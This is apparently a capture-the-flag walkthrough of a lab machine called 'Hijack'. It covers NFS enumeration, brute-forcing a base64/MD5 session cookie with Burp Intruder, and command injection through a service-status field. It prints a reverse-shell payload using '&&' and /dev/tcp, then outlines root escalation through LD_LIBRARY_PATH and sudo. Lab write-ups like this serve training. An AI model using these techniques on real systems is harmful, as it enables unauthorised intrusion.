HIJACK

hij

Enumeration

An NMAP scan reveals that a number of services are running on the open ports of the system.

The services of interest are FTP on port 21, ssh on port 22, http on port 80 and nfs on port 2049. From the NMAP results, FTP does not allow anonymous login. Let’s take a look at the website on port 80.

The website has an admin panel that cannot be accessed because you do not have the rights to do so. You can run a gobuster scan to find if there are hidden directories in the website.

The results of the gobuster scan shows that there are no hidden directories of interest. One of the services running on the target machine is NFS. You can list the shares on the target using the command;

There is only one share on the system which you can mount to your machine and try to find any helpful information that can allow you to access the machine.

There are two files of interest here: .passwords_list.txt and from_admin.txt

The contents of the latter file reveals that the admin is using one of the passwords from the list. It also reveals that there is another user known as rick. With this information, it’s time to pay another visit to the website and play around with it.

Trying to log into the website using the username admin and the password admin reveals that a user with this name exists but the password is incorrect. Trying this multiple times using default passwords reveals that you only have 5 tries before the system locks you out for 300 seconds.
You can now try and create a user account to see if there are any parameters, such as cookies, that are present for a user.

You find that there is indeed a cookie for the user that is logged in. Examining this cookie reveals that it is encoded in base64. By decoding it, it can be seen that the cookie is in the format user:password where the password is hashed in MD5.

With the password wordlist obtained from ftp, you can now bruteforce into the system using Intruder on Burpsuite. You can reload the logged in page of the user you created, capture this on Proxy, send it to Intruder and add the wordlist as well as rules for processing. For the cookie to be created, the password is hashed in MD5, the username is appended to this and then the result is encoded in base64. The rules should reflect this in this exact order.

Click on the result that has a different time length than the rest. This is the cookie for the admin panel.

Now you can log into the account you created and change the cookie to this value. You now have access to the admin panel where you can check the status of a service.

While here, you can try to inject a command that gives you a reverse shell. I tried using a semi-colon after inputting ftp but the system detected this as a command injection. The other option is to use && where the second commnad is executed only after the first is completed. With this, you can perform command injection as such to get a reverse shell;

ftp && bash -c "bash -i >& /dev/tcp/ip/port 0>&1"

where ip is your listening IP and port is your netcat listening port and executing this gives you a shell.

Viewing the contents of config.php reveals credentials for the user rick which you can ssh into.
Now, you can get your first flag.

Now, let’s try to gain a root shell. The first vector I usually try is sudo -l. Luckily, that gets you a relevant vector for privesc in this case.

You can leverage the LD_LIBRARY_PATH environment variable to gain a root shell. This is outlined well here.
The steps are as shown below. Copy the code provided into a c file (shell.c). Compile the code as is shown and then run the code and append the sudo command that rick is allowed to run on the system.